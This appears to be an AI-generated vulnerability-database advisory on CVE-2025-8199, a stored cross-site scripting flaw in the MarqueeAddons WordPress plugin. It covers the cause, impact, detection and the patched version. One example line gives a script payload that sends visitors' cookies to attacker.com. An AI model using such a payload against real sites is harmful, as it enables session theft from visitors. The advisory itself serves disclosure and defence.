
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-8199 is a Stored Cross-Site Scripting (XSS) vulnerability in the MarqueeAddons plugin for WordPress, specifically within the Testimonial Marquee widget. It affects all versions up to and including 2.4.3 and stems from insufficient input sanitization and output escaping on user-supplied attributes. The vulnerability was published on December 13, 2025, and assigned by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability exists because the Testimonial Marquee widget in the MarqueeAddons plugin fails to properly sanitize user-supplied widget attributes before storing them and fails to escape them on output. An authenticated attacker with at least contributor-level access can craft a malicious widget configuration containing arbitrary JavaScript, which is then stored in the database and executed in the browsers of any user who visits a page containing the injected widget (Wordfence, ENISA EUVD).
Successful exploitation allows an authenticated contributor-level attacker to inject persistent malicious scripts into WordPress pages, which execute in the context of any visitor's browser. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or delivery of further malware payloads to site visitors. The CVSS scope is marked as Changed, reflecting that the impact crosses from the attacker's session into the browsers of other users (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-8199. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, ENISA EUVD).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based payload.wp_posts or wp_postmeta tables containing <script> tags or JavaScript event handlers (e.g., onerror, onload) within Elementor widget data associated with the Testimonial Marquee widget./wp-admin/post.php or the Elementor AJAX endpoint (/wp-admin/admin-ajax.php) from contributor-level accounts containing encoded script tags in the request body.The vendor (debuggersstudio) released a patched version of the MarqueeAddons for Elementor plugin (version 2.4.4) that addresses the insufficient sanitization and escaping. Site administrators should update the plugin to version 2.4.4 or later immediately via the WordPress plugin dashboard or by applying the changeset directly. As a temporary workaround, restricting contributor-level user registration or disabling the Testimonial Marquee widget until the update is applied can reduce exposure (Wordfence, WordPress Plugin Changeset).
Wordfence included CVE-2025-8199 in their weekly WordPress vulnerability report for December 8–14, 2025, as part of routine disclosure coverage. No significant independent researcher commentary, vendor statements beyond the patch release, or notable media coverage has been identified for this vulnerability (Wordfence Weekly Report).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."